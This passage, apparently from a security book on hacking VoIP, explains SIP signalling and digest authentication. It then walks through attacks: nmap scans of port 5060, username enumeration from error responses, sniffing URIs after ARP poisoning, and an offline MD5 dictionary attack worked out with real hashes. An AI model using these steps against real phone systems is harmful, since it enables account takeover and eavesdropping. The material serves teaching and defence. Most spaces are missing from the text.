SIPBasicsAtypicalSIPVoIPsolutionincludesfourparts:SIPUserAgents,Registrars,Redirectservers,andProxyservers.SIPusuallylistensonTCPorUDPport5060,butitcanbeconfiguredtoanyportdesired.Thefollowingisabriefoverviewoftheirfunctions.

UserAgent

AUserAgentisasoftphoneorhardphonewithSIPcallingcapabilities.TheUserAgentcaninitiatecallsandacceptcalls.

Registrar

TheRegistrarserverregistersUserAgentsonanetworkandcanbealsousedforauthenticatingthem.

Redirectserver

TheRedirectserveracceptsSIPrequestsandreturnstheaddressthatshouldbecontactedtocompletetheinitialrequest(inthecaseofmultiplelocationsforSIPUserAgents).

Proxyserver

TheProxyserverforwardstraffictoandfromUserAgentsandotherlocationsordevices.Proxyserversmayalsobeinvolvedinroutingandauthentication.BecauseVoIPprotocolsarenotveryfirewallfriendly,aProxyserverisoftenusedtocentralizeVoIPpacketsonanetwork.

TheSIPprotocol

TheSIPprotocolisbuiltsimilarlytotheHTTPprotocol,bothcontainingdifferentrequestmethodstoinvokespecificactions.ThefollowingisalistofSIPmethodsfromthecore

protocolandtheiractions.INVITETheINVITEmethodinvitesaVoIPUserAgenttoacall.AnINVITErequestissentbyoneUserAgenttoanotherUserAgenttoinitiateacall.INVITEstravelfromthesourceUserAgenttoanynumberofRegistrars,Redirectservers,andProxyservers,andthenontothedestinationUserAgent.REGISTERTheREGISTERrequestregistersaSIPUserAgentwithaRegistrar.TheREGISTERrequestissentbyaUserAgenttoaRegistrarforthedomain,andtheRegistrarserverregistersalltheUserAgentswithinaspecificdomain.ItisalsousedwithProxyserverstoroutecallstoandfromUserAgents.ACKAnACK(acknowledge)messageissentfromoneUserAgenttoanotherinordertoconfirmreceiptofamessage.TheACKisusuallythethirdpartofathree-partprocess,indicatingthatthehandshakeiscompletedbetweentwoUserAgentsandthemediaportionofthecallcanbegin.CANCELTheCANCELmethodcancelsanexistingINVITEmessage.AUserAgentcansendaCANCELrequesttoterminateapreviousvalidrequest.BYETheBYEmethodhangsupanexistingVoIPcallorsession.TheBYEmethodisusedtoterminateaspecificsession.OPTIONSTheOPTIONSmethodisusedtolistthecapabilitiesandsupportedmethodsofaUserAgentorProxyserver.AswithHTTP,whenOPTIONSissentfromaUserAgenttoaProxyserver,theProxyservercanrespondwithalistofmethodsitsupports.

SIPMessagesASIPmessageusuallycontainsafewmoreitems,includingthefollowing:

ToFieldTherecipientoftheoriginalSIPmessageFromFieldThesenderoftheSIPmessageContactFieldTheIPaddressoftheSIPUserAgentCall-IDFieldAnumberthatuniquelyidentifiesagivencallbetweentwoUserAgents;allSIPmessagesthatbelongtoasinglecommunicationstream(asinglephonecall)usethesameCall-IDsothatthepacketswillbegroupedcorrectlyCSeqFieldSequencenumberofSIPmessages;asequencenumberisavaluethatshowstheorderofpacketswhenseveralpacketsaresentbetweenentities,anditusuallyincrementsbyoneContent-TypeFieldTheMIMEtypeforthepayload,suchasapplication/sdp

Content-LengthFieldThesizeofthepayloadinthepacketWhileSIPprovidesclearandstraightforwardmethodstocommunicatefromaUserAgenttoaRegistrar,Redirectserver,Proxyserver,oranotherUserAgent,itlacksamethodofstrongauthenticationorauthorization.ThislackofstrongsecuritycanallowattackerstoabuseSIPonVoIPnetworks.VoIPnetworksusingSIPidentifyuserswithidentifiersthatarenomoresecurethananemailaddressorawebURL.Specifically,SIPURIs(UniformResourceIdentifiers)identifyaSIPUserAgentintheformofSIP:user@domain,SIP:user@domain:port(ifthereisnoportlisted,itdefaultsto5060),orSIP:user@IPaddress.Forexample,ifSoniabelongstotheAum.comdomainandKusumbelongstotheOm.comdomain,theiridentitieswouldbeSIP:Sonia@Aum.comandSIP:Kusum@Om.com.WhenSoniacallsKusumoveraSIP-enabledVoIPnetwork,DNSserversareusedtoroutethecallappropriately(usuallyviaProxyservers).However,IPaddressescanbeusedinplaceofthedomain

field,asinSIP:Sonia@192.168.11.08,toalleviatetheneedforDNSservers.

MakingaVoIPCallwithSIPMethodsNowthatwe'vebrieflycoveredSIPmethods,let'swalkthroughanexampleofaVoIPcallusingthemethods.ThefollowingstepshighlightasampleVoIPcallusingSIP.Thecallinvolvestwousers,theirUserAgents(SoniaandKusum),andtheirrequiredintermediatesystems.Figure2-1illustratesthestep-by-stepprocess.

Figure2-1.SampleVoIPcallusingSIP

Registration

First,SIPUserAgentSoniaregisters withtheRegistrarinitsdomain(Aum.com),andSIPUserAgentKusumregisters withtheRegistrarinitsdomain(Om.com).Ifauthenticationhasbeenenabled,itoccursduringtheREGISTERorINVITEsteps,asshownhere:

REGISTERsip:Sonia@Aum.comSIP/2.0Via:SIP/2.0/UDP192.168.5.122:5060From:Sonia<sip:Sonia@Aum.com>To:Sonia<sip:Sonia@Aum.com>;tag=110806Call-ID:1108200600

CSeq:1REGISTERContact:<sip:Sonia@192.168.5.122>EXPIRES:3600Content-Length:0

REGISTERsip:Kusum@Om.comSIP/2.0Via:SIP/2.0/UDP172.16.11.17:5060From:Kusum<sip:Kusum@Om.com>To:Kusum<sip:Kusum@Om.com>;tag=111706Call-ID:1976111700CSeq:1REGISTERContact:<sip:Kusum@172.16.11.17>EXPIRES:3600Content-Length:0

TheINVITERequest

SoniawishestomakeaphonecalltoKusum.

1. Sonia'sUserAgentsendsanINVITErequest totheSIPProxyserverfromSonia@Aum.comtoKusum@Om.com.

INVITEsip:Kusum@Om.comSIP/2.0Via:SIP/2.0/UDP192.168.5.122:5060From:Sonia<sip:Sonia@Aum.com>;tag=110806To:Kusum<sip:Kusum@Om.com>Call-ID:2006110800CSeq:1INVITEContact:<sip:Sonia@192.168.5.122>Content-Type:application/sdpContent-Length:141

2. TheProxyserverinSonia'snetworkperformsaDNSlookupforOm.com.AfterthelookupiscompleteandOm.comislocated,Sonia'sProxyserversendstheINVITErequesttotheProxyserverinKusum'snetwork.

3. TheProxyserverintheOm.comnetworkperformsalookupforKusum'slocation.TheSIPRegistrarrespondstothelookupwithKusum'saddresslocation.TheProxyserverinKusum'snetworksendsa100Tryingmessage toSonia

toindicatethattheINVITErequesthasbeenreceivedbutnotyetsenttoKusum.

4. TheProxyserverinKusum'snetworkforwardstherequesttoKusum.

5. Kusum'sUserAgentreadstherequest.SIP/2.0100Trying

From:Sonia<sip:Sonia@Aum.com>;tag=110806To:Kusum<sip:Kusum@Om.com>Call-ID:2006110800CSeq:1INVITEContent-Length:0

6. Kusum'sUserAgentsendsa180Ringingmessage toSonia,indicatingthattheremotetelephoneisringing.

SIP/2.0180Ringing

From:Sonia<sip:Sonia@Aum.com>;tag=110806To:Kusum<sip:Kusum@Om.com>Call-ID:2006110800CSeq:1INVITEContentLength:0

7. OnceKusumanswersthephone,herUserAgentsendsa200OK toSonia(assumingshewantstoproceedwiththephonecall).

SIP/2.0200OK

From:Sonia<sip:Sonia@Aum.com>;tag=110806To:Kusum<sip:Kusum@Om.com>Call-ID:2006110800CSeq:1INVITEContact:<sip:Kusum@172.16.11.17>Content-Type:application/sdpContent-Length:140

8. Afterreceivingthe200OKmessage,SoniasendsACK toKusum,acknowledgingthatshereceivedthe200OKmessageandthattheycanproceedwiththeVoIPcall.

ACKsip:Kusum@Om.comSIP/2.0Via:SIP/2.0/UDP192.168.5.120:5060

Route:<sip:Kusum@192.186.5.120>From:Sonia<sip:Sonia@Aum.com>;tag=110806To:Kusum<sip:Kusum@Om.com>;tag=1117706Call-ID:2006110800CSeq:1ACK

Content-Length:0

9. RTPpacketsarethenexchanged(onthemedialayer,notthesessionlayer).RTPistheprotocolthatactuallytransferstheaudio(media)foreachphone,butSIPisusedtosetupthesession.BothprotocolsworktogetherfortheentireVoIPsession.(RTPisdiscussedindetailinChapter4.)

10. Oncethephonecalliscomplete,SoniacanterminatethecallbysendingaBYEmessage toKusum.

BYEsip:Kusum@Om.comSIP/2.0Via:SIP/2.0/UDP10.20.30.41:5060To:Kusum<sip:Kusum@Om.com>;tag=1117706From:Sonia<sip:Sonia@Aum.com>;tag=110806Call-ID:2006110800CSeq:1BYE

Content-Length:0

11. KusumacceptstheterminatedcallandsendsanOKmessage toSonia.

SIP/2.0200OK

To:Kusum<sip:Kusum@Om.com>;tag=1117706From:Sonia<sip:Sonia@Aum.com>;tag=110806Call-ID:2006110800CSeq:1BYEContent-Length:0

EnumerationandRegistrationNetworkportscannerscanbeusedtoenumerateSIPUserAgents,Registrars,Proxyservers,andotherSIP-enabledsystems.SIPusuallylistensonTCPorUDPport5060.

Note✎

OtherprotocolsrequiredforVoIPcalls,suchasRTP,listenonstatic/dynamicportsotherthanport5060.Whileport5060isusedtosetupthesessionusingSIP,theactualmediatransmissionusesotherports.

EnumeratingSIPDevicesonaNetwork

Here'showtoenumerateSIPdevicesonanetwork,stepbystep:

1. DownloadNmapfromhttp://insecure.org/nmap/.2. Enternmaponthecommandline(Windows)orshell(Unix)

toretrievethesyntaxofthetool.3. Enterthefollowingnmapcommandonthecommand

line/shelltoenumerateSIPUserAgentsandotherintermediatedevices.

nmap.exe-sU-p5060IPAddressRange

4. Or,foraclassBnetworkaddressrangeona172.16.0.0network,enter:

nmap.exe-sU-p5060172.16.0.0/16

5. EachIPaddressthatshowsopenfortheSTATE(asshowninFigure2-2)isprobablyaSIPdevice.AsyoucanseeinFigure2-2,theaddresses172.16.1.109and172.16.1.244areprobablySIPdevices.

Figure2-2.EnumeratingSIPentities

RegisteringwithIdentifiedSIPDevices

OnceSIPdeviceshavebeenidentifiedonthenetwork,onecanattempttoregisterwiththemusingaSIPUserAgent.Additionally,becauseauthenticationisoftendisabledorenabledusingweakpasswords,suchasthetelephonenumberofthephone,thisprocesscanberathereasy.(I'lldiscussbreakingauthenticationlaterinthischapter.)OnceaSIPUserAgentregisterswithaRegistrar,allavailableSIPinformationonthenetwork,suchasotherSIPUserAgents,canbeenumerated.Ifauthenticationhasbeendisabledonthedevice,anonymousunauthorizedusersmaybeabletofindallSIPentitiesonthenetwork.ThisinformationcanbeusedtotargetspecificphonesontheVoIPnetwork.CompletethefollowingexercisetoregisteraSIPUserAgentwithaSIPRegistrar.

1. Download,install,andrunaSIPUserAgent,suchasX-Litefromhttp://www.xten.com/index.php?menu=download/.

2. Download,install,andrunaPBXserverrunningSIP,suchasAsterisk.Youcandownloadapre-configuredversionofAsteriskfromhttp://www.vmware.com/vmtn/appliances/directory/302/thatrunsunderVMwarePlayer.

3. Downloadthepre-configuredSIP.conffilefromhttp://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/

4. Copysip.confto/etc/asteriskontheVoIPVMwareappliance.5. StartX-Liteandright-clickitsmaininterface.6. SelectSIPAccountSettings.7. SelectAddandenterthefollowinginformationforeach

field:a. Username:Soniab. Password:HackmeAmadeusc. Domain:IPaddressoftheVoIPonCDVMwareappliance

8. CheckRegisterwithdomainandreceiveincomingcalls.9. SelecttheTargetDomainradiobutton.

10. SelectOKandClose.

You'redone!YouhavenowregisteredtoaSIPserverusingtheSIPUserAgent.

Authentication

SIPusesdigestauthenticationforuservalidation,whichisachallenge/responsemethod.[1]TheauthenticationprocessislargelybasedonHTTPdigestauthentication,withafewminortweaks.WhenUserAgentssubmitaSIPREGISTERorINVITEmethod

toaserverthatrequiresauthentication,a401or407errormessageisautomaticallysentbytheserver,indicatingthatauthenticationisrequired.Withinthe401or407response,therewillbeachallenge(nonce).ThechallengeisusedinthedigestauthenticationprocessthatwilleventuallybesubmittedbytheUserAgent.Specifically,theUserAgentmustincludethefollowingentitiesinitsresponse:

UsernameTheusernameusedbytheSIPUserAgent(e.g.,Sonia)RealmTheassociateddomainforthesession(e.g.,isecpartners.com)PasswordThepasswordusedbytheSIPUserAgent(e.g.,HackmeAmadeus)MethodSIPmethodusedduringthesession,suchasINVITEandREGISTERURITheUniformResourceIdentifierfortheUserAgent,suchasSIP:192.168.2.102Challenge(nonce)Theuniquechallengeprovidedbytheserverinthe401or407responseCnonceTheclientnonce.Thisvalueisoptional,unlessQualityofServiceinformationissentbytheserver,andusuallythevalueisabsent.NonceCount(nc)Thenumberoftimesaclienthassentanoncevalue;thisvalueisoptionalandisusuallyabsent.

ThefollowingstepsoutlinetheprocessofaSIPUserAgent'sauthenticatingtoaSIPserverusingdigestauthentication:

1. ASIPUserAgentsendsarequestforcommunication(viaaREGISTER,INVITE,orsomeotherSIPmethod).

2. Theserver(e.g.,RegistrarorSIPProxyserver)respondswitheithera401or407unauthorizedresponse,whichcontainsthechallenge(nonce)tobeusedfortheauthenticationprocess.

3. TheSIPUserAgentperformsthreeactionsinordertosendthecorrectMD5responsebacktotheserver,whichwillprovethatithasthecorrectpassword.Thefirststepisto

createahashconsistingofitsusername,realm,andpasswordinformation,accordingtothefollowingsyntax:

MD5(Username:Realm:Password)

4. Forthesecondaction,theUserAgentcreatesasecondMD5hashconsistingoftheSIPmethodbeingused,suchasREGISTER,andtheURI,suchasSIP:192.168.2.102,accordingtothefollowingsyntax:

MD5(Method:URI)

5. Forthelastaction,theSIPUserAgentcreatesanMD5hashtobeusedforthefinalresponse.ThishashcombinesthefirstMD5hashinstep3,thechallenge(nonce)fromtheserverfromthe401/407packet,thenoncecount(ifonehasbeensent),cnonce(ifonehasbeensent),andthesecondMD5hashfromstep4,asfollows:

MD5(MD5-step-3:nonce:nc:cnonce:MD5-step-4)

Thencandcnonceareoptional,sotheequationcouldalsobe:

MD5(MD5-step-3:nonce:MD5-step-4)

6. TheclientsendsthefinalMD5hashcreatedinstep5totheserverasits"response"value.

7. Theserverperformsthesameexerciseastheuserdidinsteps3,4,and5.IftheresponsefromtheUserAgentmatchestheMD5hashvaluecreatedbytheserver,theservercanthenconfirmthatthepasswordiscorrect,andtheuserwillbeauthenticated.

AnexampleauthenticationprocessbetweenaSIPUserAgentandaSIPserverisshowninFiguresFigure2-3(adigestchallengefromtheSIPserver)andFigure2-4(theauthenticationresponsefromtheSIPUserAgent).

Figure2-3.DigestchallengefromSIPserver

Figure2-4.AuthenticationresponsefromSIPUserAgent

NoticeinFigure2-3thatthechallenge(nonce)valueis350c0fecandthattherealmisisecpartners.com.InFigure2-4theusernameisSonia,andtheURIisSIP:192.168.2.102.Basedonthisinformation,andaccordingtosteps1through7,theresponsecalculatedbytheUserAgentwouldbe:

1.MD5(Sonia:isecpartners.com:HackmeAmadeus)=49be40838a87b1cb0731e35c41c06e042.MD5(REGISTER:sip:192.168.2.102)=92102b6a8c0f764eeb1f97cbe6e67f213.MD5(49be40838a87b1cb0731e35c41c06e04:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)=717c51dadcad97100d8e36201ff11147(FinalResponseValue)

Encryption

Likemanyotherprotocols,SIPdoesnotofferencryptionnatively.However,it'simportanttouseencryptionatthesignalinglayerinordertoprotectsensitiveinformationtraversingthenetwork,suchaspasswordsandsequencenumbers.SimilartotheHTTPprotocol,TLS(TransportLayerSecurity,successortoSSLv3)canbeusedtosecureSIP.TLScanprovideconfidentialityandintegrityprotectionforSIP,protectingitagainstmanyofthesecurityattacksdiscussedlaterinthischapter.Inthefollowingsection,wewilldiscusshowTLSandS/MIMEcanbeusedtosecureSIP;however,asofthiswriting,theimplementationisnotwidelysupported.

SIPwithTLS

UsingTLSwithSIP(SIPS)isquitesimilartousingTLSonHTTP(HTTPS).Here'showitworks:

1. AUserAgentsendsamessagetoaserverandrequestsaTLSsession.

2. TheserverrespondstotheUserAgentwithapubliccertificate.

3. TheUserAgentverifiesthevalidityofthecertificate.4. TheserverandUserAgentexchangesessionkeystobe

usedforencryptinganddecryptinginformationsentalongthesecurechannel.

5. Atthispoint,theservercontactsthenexthopalongtheroutefortheSIPUserAgenttoensurethatcommunicationfromhop2tohop3(andsoforth)isalsoencrypted,whichensureshop-to-hopencryptionbetweentheSIPUserAgentsandallintermediateserversanddevices.

Figure2-5illustratesaVoIPcallusingSIPwithTLSsecurity.

Figure2-5.SampleSIPcommunicationwithTLS

Here'swhat'shappeninginFigure2-5:

1. SIPUserAgentrequestsTLSsecuritywiththeSIPProxyservernumber1.

2. SIPProxyserver1sendsitspubliccertificatetotheSIP

UserAgent.3. SIPUserAgentverifiesthevalidityofthecertificate.4. SIPProxyserver1andSIPUserAgentexchangesession

keys,enablingencryptionbetweenthem.5. SIPProxyserver1contactsSIPProxyserver2toencrypt

hopnumber2.6. Steps1through4arerepeatedbetweenbothProxy

servers.7. Step5isrepeatedbetweeneachhopontherequested

communicationchannel.

SIPwithS/MIME

InadditiontoTLS,S/MIME(SecureMultipurposeInternetMailExchange)canalsobeusedforsecuringthebodiesofSIPmessages.S/MIMEcanprovideintegrityandconfidentialityprotectiontoSIPcommunication;however,itisconsiderablymoredifficulttoimplementthanTLS.BecauseSIPmessagescarryMIMEbodies(audio),S/MIMEcanbeusedtosecureallcontentofmessagessenttoandfromanotherUserAgent.SIPheaders,however,remainintheclear.InordertodeployS/MIME,eachUserAgentmustcontainanidentifyingcertificatewithpublicandprivatekeys,whichareusedtosignand/orencryptmessageinformationinSIPpackets.Forexample,ifuserSoniawantstosendaSIPpacketwithS/MIMEtouserKusum,shewouldencryptthebodyoftheSIPpacketwithKusum'spublickey.BothSoniaandKusummustalsohaveakeyringthatcontainseachother'scertificatesandpublickeysinorderforeachtoreadtheencryptedmessage.ThisimplementationissimilartoPrettyGoodPrivacy(PGP),whereinasenderencryptsamessagewiththereceiver'spublickey.Becausethereceiver'sprivatekeyistheonlykeythatcanbeusedtoretrieveinformationencryptedwiththereceiver's

publickey,dataissafedespitetheuseofpublicnetworksfortransfer.Therefore,usersareoftenforcedtouseself-signedcertificatesthatofferverylittleprotectionbecausetheycaneasilybefaked.WhileitispossibletodistributecertificateswithintheSIPpacketitself,withoutacentralauthoritythereisnotagoodmethodforaUserAgenttoverifythatthecertificatereceivedisactuallyassociatedwiththesenderoftheSIPpacket.

[1]SeeSection22.4intheSIPRFC3261fordigestauthenticationinformation.

SIPSecurityAttacksNowthatweknowthebasicsofSIPauthenticationandencryption,let'sdiscusssomeofthesecurityattacks.ItisnosecretthatSIPhasseveralsecurityvulnerabilities;somearedocumentedintheRFCitself,andasimplewebsearchforVoIPsecurityissuewillreturnseveralhitsthatinvolveSIPsecurityweaknesses.WhileanentirebookcouldbedevotedtoSIPsecurityattacks,we'llfocusonVoIPattacksondevicesusingSIPforthesessionsetup.We'llcoverafewofthemorepopularattacksinthemostcriticalattackclasses,namely:

UsernameenumerationSIPpasswordcracking(dictionaryattack)Man-in-the-middleattackRegistrationhijackingSpoofingRegistrarsandProxyserversDenialofService,including

BYEREGISTERun-register

UsernameEnumeration

UsernameenumerationinvolvesgaininginformationaboutvalidaccountsregisteredontheVoIPnetworkbyusingerrormessagesfromSIPProxyserversandRegistrarsorbysniffing.Similartoanysecurityattack,informationleakageisoftenthefirst80percentoftheprocess.Themoreinformationleakedbyatarget,themorelikelyanattackeristosucceed.Therefore,enumeratingusernamesisoftenthefirststepofanattack.

EnumeratingSIPUsernameswithErrorMessages

SIPusernamescanbeenumeratedviaerrormessagessentbySIPProxyserversand/orRegistrars.IfaUserAgentsendsaREGISTERorINVITErequestwithavalidusername,a401responseisreceived.However,ifaREGISTERorINVITErequestissentwithaninvalidusername,a403responseisreceived.Anattackercansimplybrute-forcetheprocessbysendingouthundredsofREGISTERpacketswithdifferentusernamevalues.Foreachrequestthatrespondswitha401value,theattackerwillknowthatheorshehasuncoveredavalidusername.CompletethefollowingstepstoenumerateSIPusernamesviaanerrormessageresponse:

1. DownloadandinstallSiVuSfromhttp://www.vopsecurity.org/.

2. UndertheSIPtab,selectUtilities►MessageGenerator.3. Itemsathroughjinthefollowinglistshouldbeentered

intotheSiVusSIPMessageGeneratortab.IntheSIPMessagesectionofSiVuS,enterthecorrectvaluesforthelocalVoIPnetwork,whereDomainwouldbetheProxyserverorRegistrar.Forexample,itemsinitalicshouldbecustomizedtothespecificlocalenvironment.Inordertoenumerateusernames,changetheusernameinstepcbelowtotheusernameyouwishtoenumerate.OurfirstrequestwilltrytodetermineiftheusernameSoniaexistsonthe192.168.2.102domain.a. Method:REGISTERb. Transport:UDPc. CalledUser:Soniad. Domain:192.168.2.102e. Via:SIP/2.0/TCP192.168.5.102

f. To:Sonia<sip:Sonia@192.168.2.102>g. From:Attacker<sip:Attacker@192.168.2.102>h. FromTag:ff761a48i. Call-ID:

845b1f52dd197838MThmMDVhZWRkYZIxMmI1MjNiNDA4MThmYTJiODdiMzM

j. Cseq:1REGISTER

IftheSIPProxyserverorRegistrarreturnsa401responsepacket,theuserSoniahasjustbeenenumerated.Ifnot,theuserSoniaisnotusedonthisVoIPnetwork.

EnumeratingSIPUsernamesbySniffingtheNetwork

WhenauthenticationisrequiredbetweenaUserAgentandSIPserver,theURIissentfromtheUserAgenttotheserver.UnlesssomesortoftransportencryptionhasbeenusedbetweentheUserAgentandtheauthenticatingserver,suchasTLS,theURItraversesthenetworkincleartext.Hence,theURIstandardofSIP:User@hostname:portcansimplybesniffedbyanattackeronthenetwork.

Warning☠

AswitchednetworkprovideslittleprotectionasanattackercanperformanARPpoisoningman-in-the-middleattackandcapturealltheSIPURIswithinthelocalsubnet.

Theuseofcleartextusernamesplacesmorepressureonthesecurityoftheclient'spassword,becausetheusernameisgivenawayfreely.Furthermore,amalicioususercanattemptseveralattacksoncetheusernameiscaptured,suchasabrute-forceattack.Additionally,becauseenterprisesoftenuseusernamesorphoneextensionsaspasswords,ifanattackercaneasilyobtainausernameorphoneextension,theUserAgentcouldbeeasilycompromised.

Figure2-6showsanexampleofasniffedusernameoverthenetworkusingWireshark.InordertoviewtheSIPusernameinWireshark,onewouldsimplynavigatetotheSIPsectionofthepacket,expandtheMessageHeadersection,andviewtheTo,From,andContactfields.ThesefieldsshowtheUserAgent'susernameincleartext.

Note✎

Anothertool,calledCain&Abel,canalsobeusedtoenumerateusernames,asshownlaterinthechapter.

Figure2-6.SIPusernameinWireshark

SIPPasswordRetrieval

NowthatweknowhowtoeasilyretrievetheusernameofSIPUserAgents,let'sattempttogetthepassword.SIP'sauthenticationprocessusesdigestauthentication.Asdiscussedin"SIPBasics"onSIPBasics,thismodelensuresthatthepasswordisnotsentincleartext;however,themodelisnotimmunetobasicofflinedictionaryattacks.TheSIPUserAgentusesthefollowingequationstocreatetheMD5responsevalueusedtoauthenticatetheendpointtotheserver(itemsinitalictraversethenetworkincleartext).Noticethattheonlyitemthatisnotexposedtoapassiveanonymousmachineonthenetworkisthepassword,whichmeansthatitisvulnerabletoanofflinedictionaryattack.Adictionaryattackconsistsofsubmittingadictionaryofwordsagainstagiven

hashalgorithmtodeducethecorrectpassword.Anofflineversionofthedictionaryattackisperformedoffthesystem,suchasonanattacker'slaptop:

MD5-1=MD5(Username:Realm:Password)MD5-2=MD5(Method:URI)ResponseMD5Value=MD5(MD5-1:Nonce:MD5-2)

Inordertoperformanofflinedictionaryattack,theattackermustfirstsnifftheusername,realm,method,URI,nonce,andtheMD5Responsehashoverthenetwork(usingaman-in-the-middleattackontheentiresubnet),whichareallavailableincleartext.Oncethisinformationisobtained,theattackertakesadictionarylistofpasswordsandinsertseachoneintotheaboveequation,alongwithalltheotheritemsthathavealreadybeencaptured.Oncethisoccurs,theattackerwillhavealltheinformationtoperformtheofflinedictionaryattack.Furthermore,becauseSIPUserAgentsoftenusesimplepasswords,suchasafour-digitphoneextension,thetimerequiredtogainthepasswordcanbeminimal.

DataCollectionforSIPAuthenticationAttacks

Theinformationneededtoperformanofflinedictionaryattackisavailabletoapassiveattackerfromtwopacketsbysniffingthenetwork,includingthechallengepacketfromtheSIPserverandtheresponsepacketsentbytheUserAgent.ThepacketsentfromtheSIPservercontainsthechallengeandrealmincleartext.ThepacketfromtheUserAgentcontainstheusername,method,andURIincleartext.Oncetheattackerhassniffedallthevaluestocreatethepassword,shetakesapasswordfromherdictionaryandconcatenatesitwiththeknownusernameandrealmvaluestocreatethefirstMD5hashvalue.Next,shetakesthemethodandURIsniffedoverthenetworktocreatethesecondMD5hashvalue.Oncethetwohashesaregenerated,sheconcatenatesthefirstMD5,thenoncesniffedoverthenetwork,andthesecondMD5hashvaluetocreatethefinal

responseMD5value.IftheresultingMD5hashvaluematchestheresponseMD5hashvaluesniffedoverthenetwork,theattackerknowsthatshehasguessed(brute-forced)thecorrectpassword.IftheMD5hashvaluesarenotcorrect,sherepeatstheprocesswithanewpasswordfromherdictionaryuntilshereceivesahashvaluethatmatchesthehashvaluecapturedoverthenetwork.

Note✎

Unlikeanonlinebrute-forceattackwheretheattackermayhaveonlythreeattemptsbeforesheislockedoutornoticedonthenetwork,theattackercanperformthistestofflineindefinitelyuntilshehascrackedthepassword.Furthermore,forSIPhardphonesandsoftphoneswitheasyorbasicpasswords,theexercisewillnottakeverylong.

AnExample

Let'swalkthroughanexample.Figure2-3showsthechallengepacketfromaSIPserver.Fromthispacket,anattackercanobtainthefollowinginformation:

Challenge(nonce):350c0fecRealm:isecpartners.com

TheresponsepacketfromaSIPUserAgentisshowninFigure2-4.Fromthispacket,anattackercanobtainthefollowinginformation:

Username:SoniaMethod:REGISTERURI:SIP:192.168.2.102MD5ResponseHashValue:717c51dadcad97100d8e36201ff11147

Usingthedigestauthenticationequationoutlinedpreviously,

Usingthedigestauthenticationequationoutlinedpreviously,andboldingallitemswehavesniffedoverthenetwork,ourequationswouldnowlooklike:

SetupEquation1MD5-1:MD5(Sonia:isecpartners.com:Password)SetupEquation2MD5-2:MD5(REGISTER:sip:192.168.2.102)FinalEquation3717c51dadcad97100d8e36201ff11147:(MD5-1:350c0fec:MD5-2)

Equation1isunknown,becausethepasswordisnotsentoverthenetworkincleartext.Equation2iscompletelyknown,becausethemethodandURIareincleartext.TheMD5hashvalueforEquation2turnsouttobe92102b6a8c0f764eeb1f97cbe6e67f21.Equation3isthecombinationoftheMD5hashvaluefromEquation1,thenoncefromtheSIPserver,andtheMD5hashvaluefromEquation2.BecausethenoncefromtheSIPserverhasbeensniffedoverthenetworkandtheMD5hashvalueofEquation2canbegenerated,theMD5hashvaluefromEquation1istheonlyunknownentitytobrute-force.Toperformthedictionaryattack,twoproceduresareneeded.ThefirstprocedurewillrequiretheattackertotakeEquation1andinsertdictionarywordsinthepasswordfield,asshowninboldinthefollowingexample:

MD5-1:MD5(Sonia:isecpartners.com:Password)f3ef32953eb0a515ee00916978a04eac:MD5(Sonia:isecpartners.com:Hello)44032ae134b07cee2e519f6518532bea:MD5(Sonia:isecpartners.com:My)08e07c4feffe79e208a68315e9050fe4:MD5(Sonia:isecpartners.com:Voice)b7e9d8301b12a8c30f8cab6ed32bd0b6:MD5(Sonia:isecpartners.com:Is)44032ae134b07cee2e519f6518532bea:MD5(Sonia:isecpartners.com:My)56a88ae72cff2c503841006d63a5ee98:MD5(Sonia:isecpartners.com:Passport)7b925e7f71e32e0e8301898da182c944:MD5(Sonia:isecpartners.com:Verify)a5d8761336f52fc74922753989f579c4:MD5(Sonia:isecpartners.com:Me)49be40838a87b1cb0731e35c41c06e04:MD5(Sonia:isecpartners.com:HackmeAmadeus)

BasedontheseMD5hashvaluesfromEquation1,theMD5hashfromEquation2(92102b6a8c0f764eeb1f97cbe6e67f21),andthenoncevaluefromEquation3(350c0fec),theattackercannowexecutethesecondprocedure,whichisbrute-forcingEquation3shownearlier.Noticethatweareinsertinga

differentMD5-1value,whichisgeneratedfromeachuniquepasswordwearetryingtobrute-force,butkeepingthesamenonceandMD5-2valuesinthefollowingequation:

MD5=(MD5-1:72fbe97f:MD5-2)bba91fc34976257bb5aa47aeca831e8e=(f3ef32953eb0a515ee00916978a04eac:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)

01d0e5f7c084cbf9e028758280ffc587=(44032ae134b07cee2e519f6518532bea:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)

5619e7d8716de9c970e4f24301b2d88e=(08e07c4feffe79e208a68315e9050fe4:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)

8672c6c38c335ef8c80e7ae45b5122f8=(b7e9d8301b12a8c30f8cab6ed32bd0b6:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)

01d0e5f7c084cbf9e028758280ffc587=(44032ae134b07cee2e519f6518532bea:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)

913408579b0beb3b6a70e7cc2b8688f9=(56a88ae72cff2c503841006d63a5ee98:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)

b8178e3e6643f9ff7fc8db2027524494=(7b925e7f71e32e0e8301898da182c944:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)

c4ee4ed95758d5e6f6603c26665f4632=(a5d8761336f52fc74922753989f579c4:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)

717c51dadcad97100d8e36201ff11147=(49be40838a87b1cb0731e35c41c06e04:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)

ThefinalpasswordattemptinthepreviousexampleyieldsanMD5hashvalueof717c51dadcad97100d8e36201ff11147,whichisthesameMD5hashvaluetheattackersniffedoverthenetwork(showninthesecondtolastlineinFigure2-4).ThistellstheattackerthatthewordHackMeAmadeusistheSIPUserAgent'spassword!

ToolstoPerformtheAttack

Thisattackamplifiestheimportanceofastrongpassword—ideally,onethatcannotbebrute-forcedeasilywhenusingdigestauthentication.Ihavewrittenatoolthatcanperformthispreviousexerciseautomatically(alongwithacapturedSIP

authenticationsessionfromWiresharkoryourfavoritesniffer).Thetooltakesalistofpasswordsthatanenduserwouldliketotest,concatenatesitwiththerequiredinformationsniffedtheoverthenetwork(fromWireshark),anddeterminesiftheresultingMD5hashvaluematchesthehashvaluethatwasalsosniffedoverthenetwork.Foracopyofthetool,calledSIP.Tastic.exe,visithttp://www.isecpartners.com/tools.html/.AscreenshotofthetoolisinFigure2-7.

Figure2-7.SIPpasswordtesting

